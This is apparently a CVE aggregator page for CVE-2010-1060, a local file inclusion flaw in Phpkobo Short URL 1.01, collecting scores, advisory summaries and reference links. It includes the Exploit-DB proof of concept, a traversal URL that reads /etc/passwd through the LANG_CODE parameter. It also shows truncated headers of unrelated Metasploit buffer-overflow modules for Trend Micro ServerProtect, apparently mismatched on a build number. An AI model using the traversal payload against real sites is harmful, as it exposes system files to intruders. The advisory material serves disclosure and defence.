CVE-2010-1060
published 2010-03-23CVE-2010-1060: Directory traversal vulnerability in staff/app/common.inc.php in Phpkobo Short URL 1.01, when magic_quotes_gpc is disabled, allows remote attackers to include…
PriorityP337medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
1.86%
76.5th percentile
Directory traversal vulnerability in staff/app/common.inc.php in Phpkobo Short URL 1.01, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the LANG_CODE parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpkobo | short_url | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
Phpkobo Short URL 1.01 common.inc.php LANG_CODE path traversal (EDB-11775 / BID-38731)
vuldb·2026-05-03·CVSS 6.8
CVE-2010-1060 [MEDIUM] Phpkobo Short URL 1.01 common.inc.php LANG_CODE path traversal (EDB-11775 / BID-38731)
A vulnerability labeled as problematic has been found in Phpkobo Short URL 1.01. The affected element is an unknown function in the library codelib/cfg/common.inc.php. Executing a manipulation of the argument LANG_CODE can lead to path traversal.
This vulnerability is registered as CVE-2010-1060. It is possible to launch the attack remotely. Furthermore, an exploit is available.
GHSA
GHSA-mj7w-3346-7v97: Directory traversal vulnerability in staff/app/common
ghsa_unreviewed·2022-05-02
CVE-2010-1060 [MEDIUM] CWE-22 GHSA-mj7w-3346-7v97: Directory traversal vulnerability in staff/app/common
Directory traversal vulnerability in staff/app/common.inc.php in Phpkobo Short URL 1.01, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the LANG_CODE parameter.
No detection rules found.
Exploit-DB
Trend Micro ServerProtect 5.58 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2007-1070 Trend Micro ServerProtect 5.58 - Remote Buffer Overflow (Metasploit)
Trend Micro ServerProtect 5.58 - Remote Buffer Overflow (Metasploit)
---
##
# $Id: trendmicro_serverprotect.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Trend Micro ServerProtect 5.58 Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.
By sending a specially crafted RPC request, an attacker could overflow the
buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'Re
Exploit-DB
Trend Micro ServerProtect 5.58 - 'CreateBinding()' Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2007-2508 Trend Micro ServerProtect 5.58 - 'CreateBinding()' Remote Buffer Overflow (Metasploit)
Trend Micro ServerProtect 5.58 - 'CreateBinding()' Remote Buffer Overflow (Metasploit)
---
##
# $Id: trendmicro_serverprotect_createbinding.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.
By sending a specially crafted RPC request, an attacker could overflow the
buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MS
Exploit-DB
Trend Micro ServerProtect 5.58 - 'EarthAgent.exe' Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2007-2508 Trend Micro ServerProtect 5.58 - 'EarthAgent.exe' Remote Buffer Overflow (Metasploit)
Trend Micro ServerProtect 5.58 - 'EarthAgent.exe' Remote Buffer Overflow (Metasploit)
---
##
# $Id: trendmicro_serverprotect_earthagent.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060
EarthAgent.EXE. By sending a specially crafted RPC request, an attacker could overflow the
buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'Lice
Exploit-DB
Short URL 1.01 - Local File Inclusion
exploitdb·2010-03-16
CVE-2010-1060 Short URL 1.01 - Local File Inclusion
Short URL 1.01 - Local File Inclusion
---
#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Short URL
# Version: 1.01
# Vendor: http://www.phpkobo.com/short_url.php
#################################################################
# Vulnerability Info:
# Type: Local File Inclusion
# Risk: Medium
#################################################################
Vulnerability:
http://site.com/staff/app/common.inc.php?LANG_CODE=../../../../../../../etc/passwd%00
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
################
No writeups or analysis indexed.
http://packetstormsecurity.org/1003-exploits/shorturl-lfi.txthttp://secunia.com/advisories/38968http://www.exploit-db.com/exploits/11775http://www.securityfocus.com/bid/38731http://packetstormsecurity.org/1003-exploits/shorturl-lfi.txthttp://secunia.com/advisories/38968http://www.exploit-db.com/exploits/11775http://www.securityfocus.com/bid/38731
2010-03-23
Published